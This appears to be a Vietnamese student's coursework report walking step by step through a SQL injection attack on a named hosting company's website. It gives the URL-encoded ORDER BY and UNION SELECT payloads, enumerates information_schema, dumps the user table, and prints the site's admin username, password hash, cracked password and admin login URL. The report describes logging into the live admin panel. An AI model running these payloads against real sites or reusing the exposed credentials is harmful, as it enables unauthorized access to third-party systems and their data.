HUỲNH QUỐC NHA LỚP 12TLT.CNTT
MÃ SINH VIÊN: 102120324
WEB HACK : http://www.hostingak.net/
Trang gốc chọn để hack : http://www.hostingak.net/?frame=product_detail&id=294
Hình 1 : Trang web gốc
Trang 2Ta kiểm tra , bằng cách thêm dấu nháy “ ‘ ” sau URL : … Id=294 : http://www.hostingak.net/?frame=product_detail&id=294%27
Hình 2 : Kiểm tra trang web lỗi
Trang 3Bước 2:Đếm số cột dùng order by đế xác định cột Ban đầu mình thử đoán số column là 1
Ta nhập vào link sau : http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%201
Và kết quả là :
Hình 3 : kết quả bình thường khi thử với “ order by 1 ”
Trang 4Ta tiếp tục thử với “ order bay 15 ”
Kết quả là :
http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2015 Hình 4 : kết quả vẩn bình thường khi thử với “ order by 15 ”
Trang 5Ta tiếp tục thử với “ order by 16 ”
Kết quả là :
http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2016 Hình 5 : Kết quả lỗi khi thử với “ order by 16 ”
Vậy ta kết luận có 15 cột
Trang 6Bước 3: Ta sử dụng Union liên kết 2 câu truy vấn, tìm table cần khai thác thông qua information_schema.Tables
Đầu tiên thực hiện Union
Ta có kết quả :
Hinh 6: Kết quả khi ta sử dụng Union để tìm ra cột lỗi
Như vậy a đã biết được cột lỗi là cột thứ : 6
Trang 7Tiếp đến ta sử dụng hàm version() để show ra version version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 6
và ta có kết quả
Trang 8%201,%202,3,4,5,%20version(),%207,%208,%209,%2010,%2011,%2012,13,14,15 Hình 7 : Kết quả kiểm tra phiên bản
Vậy ta có kết quả phiên bản là 5.1.73
Bây giờ ta tìm tất cả các Table của database
Kết quả là :
Hình 8: Kết quả truy vấn các Table của database
Tất cả các table của Database :
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTI
Trang 9Bước 4 trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên, ở đây ta chỉ chú ý đến tbl_user , để ta tìm các trường trong bảng này
Kết quả :
Trang 10Hình 9: Kết quả tìm các trường trong bảng tbl_user
Vậy ta có 3 trường trong bảng này là id,uid,pwd
Bước 5: Vậy là ta có talbe và column cần thiết rôi ta chỉ việc khai thác thông tin ở đây , đó là uid và pwd
Lấy thông tin uid và pwd bằng câu truy vấn sau :
Kết quả :
Trang 11%201,2,3,4,5,group_concat(uid,0x2f,pwd),7,8,9,10,11,12,13,14,15%20from%20tbl_user%20 %20-Hình 10: Kết quả truy vấn uid và pwd
Vậy ta có kết quả là : admin/e3976d13683589d21ed11314e7254778
Nghĩa là uid : admin , pwd : e3976d13683589d21ed11314e7254778 , Ta mã hóa ra : 015243
Vậy ta đã có thông tin đăng nhập quản trị, ta chỉ việc tìm đến và đăng nhậphttp://www.hostingak.net/admin/login.php
Trang 12Hình 11 : Trang đăng nhập
Đăng nhập với Username : admin Password : 015243
Nhấn button Đăng Nhập
Và đây là kết quả:
Trang 13Hình 12 : Trang Quản trị website